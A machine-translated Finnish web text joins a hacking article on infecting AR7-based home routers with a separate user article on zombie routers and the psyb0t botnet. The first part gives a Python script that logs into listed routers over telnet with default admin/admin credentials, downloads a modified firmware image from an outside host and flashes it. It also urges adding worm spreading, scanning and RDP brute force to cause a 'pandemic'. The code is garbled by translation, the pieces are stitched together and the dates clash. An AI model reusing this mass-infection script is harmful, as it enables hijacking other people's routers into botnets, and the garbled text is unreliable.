kirjoittaa uudelleen/palauta kuvia... Tämä on erittäin surullinen mahdollisuus. Jopa kädet
pudota hieman, jos otat myös huomioon, että Flash-muistin uudelleenkirjoitusresurssi
on pieni (lisätietoja muistisirun dokumentaatiossa), ja siihen on mahdollisuus
pilata hänet. Mutta sieltä on ulospääsy! Qemu voi jäljitellä AR7:ää! Voitko kuvitella mitä
tarjoaako se mahdollisuuksia ja rajatonta mukavuutta? Nyt meitä ei estä mikään
kirjoita jotain uskomattoman siistiä!

Niin. Kirjoitit ohjelman, testasit sitä omalla tai 1-2 muun reitittimellä, mutta
koko verkko on vielä edessä, sen saattaminen manuaalisesti on työlästä, 10. reitittimellä aloitat jo
kiroa koko maailma, ja "kissa" ja "mtd" leijuvat silmissäsi. Kirjoitetaan
ohjelma näiden rutiinitoimintojen automatisoimiseksi. Valitsin python-kielen.

Työsuunnitelma on seuraava:

  • koota luettelo reitittimistä esimerkiksi nmap-ohjelmalla;
  • komentosarjan pitäisi ottaa IP-osoitteet luettelosta järjestyksessä, syötä läpi
    telnet tavallisella sisäänkirjautumisella/salasanalla;
  • sitten samat vaiheet: lataa muokattu kuva,
    kirjoittaa uudelleen, käynnistää uudelleen.

#!/usr/bin/env python
#Encode=UTF-8

tuonti telnetlib,time

PALVELIN="http://anyhost.com/fs.image"

osoitteelle open("iplist.txt"):
telnet = telnetlib.Telnet(addr)
telnet.set_debuglevel(1)
telnet.read_until("kirjautuminen:")
aika.uni(5)
telnet.write("admin\n")
telnet.read_until("Salasana:")
telnet.write("admin\n")
telnet.read_until("#")
telnet.write("cd /var && wget " + PALVELIN)
telnet.read_until("#")
telnet.write("kissa fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write("reboot")
telnet.close()

Käsikirjoituksen logiikka on hyvin kaukana ihanteellisesta, nyt selitän miksi. varten
Ensin sinun tulee tarkistaa laiteohjelmiston/ytimen versio ja reitittimen malli, koska niitä voi olla
vakavia eroja työssä. Seuraavaksi sinun tulee ladata laiteohjelmistoaihioiden sijaan
tiedostojärjestelmän kuva reitittimestä, pura, muokkaa ja lähetä
takaisin. Tämä poistaa erilaisten yhteensopivuusongelmia
malleja/laiteohjelmistoversioita, koska toiminnan vakaus on sinulle tärkeintä.
Myös viruksella voi olla madon toimintoja, ja halutessasi voit aina
liitä siihen verkkoskanneri, brute force RDP:lle ja vastaavia ominaisuuksia.

On toinenkin loistava tapa levittää. Mikään ei estä sinua kirjoittamasta
Windows-ohjelma, joka sinulla on mukanasi (tai lataa se omalta
palvelin) tiedostojärjestelmän kuva ja saastuttaa sillä reitittimen, jos sellainen on.
Levitä tätä ohjelmaa kaikilla "tavallisilla" tavoilla: irrotettavat asemat,
ohjelmien hyväksikäyttö, muiden ohjelmien tartuttaminen... Yhdistämällä näitä menetelmiä,
Voit luoda vakavan pandemian. Kuvittele vain tämä kuva - loppujen lopuksi
Tällaisia ​​laitteita on kaikkialla.

Reitittimen suojaus

Kaivottuani tämän kaiken esiin, ajattelin: kuinka voin suojata reitittimen? Ja sitten näet, ja
Tulen itse paikalle. Ensimmäinen askel on vaihtaa käyttäjän salasana monimutkaisemmaksi ja
pitkiä (enintään 8 merkkiä), vaihda bannereita ja palvelutervehdyksiä
(heksaeditori tai mieluiten käännä ohjelmat uudelleen) järjestyksessä
nmap tai muut skannerit eivät pystyneet määrittämään palveluversioita.

Sinun tulisi myös vaihtaa portit, joissa demonit riippuvat. Tämän tekee
muutokset tiedostoon progdefs.xml. Tapa telnet (helppoin tapa arvata salasana, kyllä
ja protokolla on suojaamaton, miksi tarvitsemme sitä), ota palomuuri käyttöön, salli yhteys
käyttää palveluita vain omasta IP- tai MAC-osoitteestasi. Käytä myös palomuuria
verkon tai tietokoneen suojaamiseksi se ei ole turhaan käytettävissä. Älykäs asennus
säännöt auttavat sinua aina suojelemaan itseäsi.

Johtopäätös

Monille, ei vain D-Link-reitittimille ja muille vastaaville laitteille on rakennettu
AR7-siru, listalla Acorp, NetGear, Linksys, Actionec... Melko
Tämä AR7 on suosittu MontaVistan kanssa. Tästä seuraa, että käyttämällä samaa
työkaluketju, voit suorittaa artikkelissa kuvatut vaiheet ilman ongelmia.

Ajattele: haitallisten tekojen lisäksi voit tehdä jotain hyödyllistä/miellyttävää myös itsellesi
ja muut (en kiistä, hakkeroinnin iloa ei voi korvata, mutta silti).
Voit tehdä oman laiteohjelmistosi, esimerkiksi tehokkaampia reitittimiä
lataa/jaa torrentteja... Kaikissa malleissa on USB 1.1 -liitäntä, mutta nuoremmissa
malleissa sitä ei ole juotettu. Lisää ytimeen USB-moduuli ja tiedostojärjestelmäohjain,
varusta reititin Flash-muistilla - ja lopulta saat eräänlaisen verkkotallennustilan
pientä rahaa. Vaihtoehtoja on monia, mutta ideoita pitäisi syntyä tuhansittain - ei
rajoita itseäsi, luo ja luo!

Hyvät lukijat. Aikasi säästämiseksi. Puhutaanpa heti pääasiasta. KAIKKI seuraavat auttavat troijalaisten tai virusten esiintyessä tietokoneessa 5-7 päivän ajan. Tänä aikana Internetistä lähetetään skannauksia, mutta hakkeroinnin JÄLKEEN vallitsee epäilyttävä hiljaisuus - skannauksia ei ole - tartunnan saanut reititin ei enää päästä niitä tietokoneeseen, se hyväksyy komennot ja suorittaa ne. Tämä vaikuttaa Internetin nopeuteen - se laskee.

Jos reitittimesi on jo saanut tartunnan, FTP, sähköposti ja muut salasanat varastetaan lähitulevaisuudessa.

Jo vuonna 2009 joku DroneBL ilmoitti maailmalle (alku?) reitittimiä tartuttavien virusten epidemiasta. Hänen uutisensa ilmestyivät sivustoa vastaan ​​tehdyn hyökkäyksen jälkeen, kun tämän sivuston ylläpitäjät paljastivat, että tämä oli täysin uusi tyyppi Ddos-hyökkäysten joukossa. Hyökkäyksen suorittivat tartunnan saaneet reitittimet. Joten nyt zombie-tietokoneiden "perhe" on saanut uuden lisäyksen - zombie-reitittimet. Havaittiin botnet-verkko, joka koostui tartunnan saaneista kotireitittimistä! He kutsuivat tätä verkkoa "psyb0t". Näin reititinvirusepidemia alkoi virallisesti.

Hakkerointi tapahtuu skannaamalla reitittimen portit ja ottamalla sen hallintaansa. Valitettavasti Internetissä on artikkeleita siitä, kuinka tämä tai toinen reititinmalli on helpoin hakkeroida. Mutta siellä voit selvittää, kuinka suojautua tältä katastrofilta. Reitittimen hallinnan luomisen jälkeen ohikulkevan liikenteen sisällön vakoilu alkoi. Salasanan varastaminen. Liittyminen yleiseen botnet-verkkojen haitalliseen toimintaan maailman Internetissä. Tarkastetaan kotitietokoneesi portteja, mutta käsittelen tässä tarkemmin. Kirjoittaja pystyi jäljittämään, että verkkoyhteys hakkeroituun reitittimeen johtaa tällaisiin ongelmiin. Kun asennat palomuurin uudelleen, virukset ilmestyvät järjestelmään tyhjästä. Kun Debiania tai Ubuntua yritettiin asentaa ja samalla ladata päivityksiä asennuksen aikana, nämä järjestelmät eivät asentuneet oikein. Nimittäin

  1. Asennettua Firestarteria ei voi käynnistää - hallintatoiminto käynnistetään ja se on siinä. eli jotain käynnistetään järjestelmänvalvojan oikeuksilla, mutta mikä on tuntematon. Firestarter ei vain käynnisty.
  2. Jos Internet-yhteys on olemassa, Deadbeef EI käynnisty, kun sammutat reitittimen, se käynnistyy välittömästi.
  3. Jotkut järjestelmänvalvojan oikeuksia vaativat sovellukset käynnistetään ilman salasanaa, toiset eivät käynnisty ollenkaan.
  4. Tämän artikkelin kirjoittamisen jälkeen nämä kohdat ovat vähentyneet. Eli ongelmia tulee, mutta ne NÄYTTÄVÄT erilaisilta.

Uudelleenasennus SAMALLA tietokoneella, SAMALLA asennuslevyllä, reitittimen ollessa POIS PÄÄLTÄ, onnistui. Järjestelmä (testattu Ubuntussa) toimi kuin kellonkello. Tämä ei ole yllättävää, koska Linux Mipsel -käyttöjärjestelmää käyttävät reitittimet olivat ensimmäiset haavoittuvat. Tietenkin zombie-reitittimen aiheuttamat haitat ovat "monimuotoisempia" kuin olen huomannut ja kuvaillut täällä, mutta mitä olemme tällä hetkellä rikkaita, sen me jaamme...

Asennettu Windows (tartunnan saaneen reitittimen ollessa pois käytöstä) "selviytyi", mutta Agnitum Outpost Firewall Pro havaitsi porttitarkistukset ensimmäisistä minuuteista asennuksen jälkeen. Nuo. Reititin hyökkää portteihin.

Riisi. Tarkistan porttejani Internetistä ja lopuksi tartunnan saaneelta reitittimeltä.

Kuten kuvasta näkyy, skannaus tapahtui 27.04.2017 klo 23:51:16 zombie-reitittimestä. Ennen tätä skannattiin Kaspersky Security Networkista - 130.117.190.207 (palomuuri ei "tykkää" niistä, mutta tämä on normaalia, kun Kaspersky asennetaan) ja on epäselvää, missä. Ja 27.4.2012 reitittimen asetukset palautettiin tehdasasetuksiin (Huawei HG530). Siitä lähtien ne ovat peräisin vain Kaspersky Security Networkista - 130.117.190.207 ja ARP_UNWANTED_REPLY - kirjoittaja on ottanut käyttöön ARP-suodatuksen. Siksi reititin yrittää jälleen "puhua" PC:lle (tämä on reitittimen normaalia toimintaa - mutta nyt Agnitum välittää vain ne ARP-vastaukset, jotka tulevat vastauksena tietokoneeni pyyntöön), sekä joidenkin henkilöiden yritykset. Palomuuri estää liikenteen sieppaamisen väärennetyn ARP-vastauksen avulla. Jos joku sieppaa liikennettäni tällä tavalla ja välittää sen tietokoneensa läpi, olen Internetiä käyttävän toimistotyöntekijän roolissa, kun taas tämän yrityksen järjestelmänvalvoja näkee kaikki toimintani ja laatii yksityiskohtaisen raportin pomolle . Kuinka monta kirjettä kirjoitettiin (kenelle, mistä), kuinka moni keskusteli ICQ:ssa. Tietysti sähköpostin salasanat jne. He voivat myös varastaa sen.

Tuloksena on, että siitä hetkestä lähtien, kun nollasin reitittimeni ja tein alla kuvatulla tavalla, Internetistä ei ole tullut hyökkäyksiä. "Gunner" on eliminoitu, reititin on puhdas ja tekee VAIN mitä se on suunniteltu. Mutta myös tietokoneen troijalainen on poistettava, muuten se johtaa hakkerit IP-osoitteeseesi.

Verkkolaitteiden valmistajat eivät tarjoa turvatoimia. Reitittimien ohjeissa on kuvaus siitä, kuinka palveluntarjoajan sisäänkirjautuminen ja salasana syötetään, mutta ei sanaakaan, että järjestelmänvalvojan oletussalasanaa ei voi jättää reitittimeen! Lisäksi reitittimissä on välttämättä kauko-ohjainelementit, jotka ovat usein päällä. Virustorjuntaohjelmistojen valmistajat ovat hiljaa. Herää väistämättä kysymys: kuka tästä hyötyy?

Tartunnan reitit.

On parempi nähdä se kerran. Tästä syystä tarjoan GIF-animaatiota, jossa on kaavamainen analyysi tilanteesta. Jos se ei näy, Adblock tai jokin vastaava häiritsee - poista se käytöstä tällä sivulla.

Niitä on kaksi. Ensimmäinen on WAN:in eli Internetin kautta. Nuo. hakkerit löytävät IP-osoitteesi esimerkiksi kun lataat tai jaat tiedostoja torrent-protokollalla (lisätietoja artikkelin lopussa) ja skannaamalla IP-osoitteesi he löytävät heikkoja kohtia reitittimen suojauksesta. Mutta tämä on harvinaisempaa. Kuinka sulkea nämä portit, luemme lisää tästä artikkelista.

Tai tietokoneellamme on troijalainen. Ja niin hän johdattaa hakkerit dynaamiseen (!) IP-osoitteeseen. Kun he tietävät tämän osoitteen, he hakkeroivat jo järjestelmällisesti reititintä. Luimme troijalaisista toisella tartuntareitillä.

Toinen on lähiverkon kautta, eli tietokoneeltasi. Jos tietokoneessasi on troijalainen, hakkerit voivat arvata reitittimen salasanan suoraan tietokoneeltasi. Siksi tämä salasana on vaihdettava joskus. Mutta entä se, että tartunnan saanut tietokone yrittää hakkeroida reitittimen suojaamattomalta puolelta? Ensinnäkin sinun on ymmärrettävä, että puhdas reititin tartunnan saaneella tietokoneella ei kestä kauan. Säännöllinen raaka voima (salasanan arvaus) rikkoo sen viikossa tai jopa nopeammin. Joten jos sinun on puhdistettava reitittimesi usein, on aika harkita sen puhdistamista kokonaan viruksilta.

Ja nyt se hetki. Mistä virus/troijalainen tulee tietokoneelta? Luettelon tärkeimmät syyt ja ratkaisut suluissa. Vaihtoehdot ovat:

1 - alun perin murtunut Windows asennettiin (käytä tyhjiä asennuslevyjä);

2 - puhdas Windows murtui asennuksen jälkeen (joko kestä ja asenna se uudelleen kuukausittain tai osta Windows);

3 - krakattu ohjelmisto (käytä ilmaisia ​​ohjelmia tai osta maksullisia ohjelmia);

4 - sinulla on virus henkilökohtaisissa tiedostoissasi (suorita kaikki henkilökohtaiset tiedostot puhdistuksen kautta, kuten kuvailin järjestelmän puhdistamisessa viruksista);

5 - järjestelmä on saastunut jo käytön aikana flash-aseman, Internetin kautta, kuka tietää kuinka (suojaus - tutkimme Internetiä turvallisesti, muistitikuista, vaikenen viimeisestä kohdasta).

Erikseen huomautan, että löydettyään reitittimen IP-osoitteen hakkerit alkavat skannata sitä löytääkseen pääsyn salattuun salasanaan ja sitten ottavat haltuunsa varastetun salasanan avulla. Joten älä jätä reititintä päälle, jos et tarvitse Internet-yhteyttä juuri nyt.

MUTTA!!! Vaikka käynnistäisit virtuaalikoneen, ne alkavat kaataa reitittimesi. Sen poistaminen käytöstä ja uudelleen käyttöön ottaminen prosessin aikana auttaa tässä, ja PÄÄASIAA torrentin lataamisen jälkeen on, että uudelleenkäynnistyksen jälkeen palveluntarjoaja antaa reitittimelle uuden dynaamisen IP-osoitteen ja hakkereiden on vain arvattava missä osoitteessa olet nyt. . Ja myös reitittimesi... Jakeluja ei tietenkään jätetä - kun lataus on valmis, sammuta torrent-latausohjelma välittömästi ja sen JÄLKEEN kytke reititin pois päältä ja päälle.

Ja yleisesti ottaen

ÄLÄ PIDÄ REITITINTÄ PÄÄLLÄ, ellet TARVITA! Älä anna pikkuhakkereiden käyttää omaisuuttasi uudelleen... Älä unohda puhdistaa reititintäsi aina, kun Internet-yhteyden nopeus laskee kohtuuttomasti. Varovaisuus ei haittaa...

Se siitä. Nyt voit ottaa reitittimesi tehdasohjeet ja määrittää Internet-palveluntarjoajaltasi antaman kirjautumistunnuksen ja salasanan. Tämä tehdään yleensä WAN-asetukset-välilehdessä. Nyt et voi ohjata reititintäsi Internetin kautta. Ainakin toistaiseksi.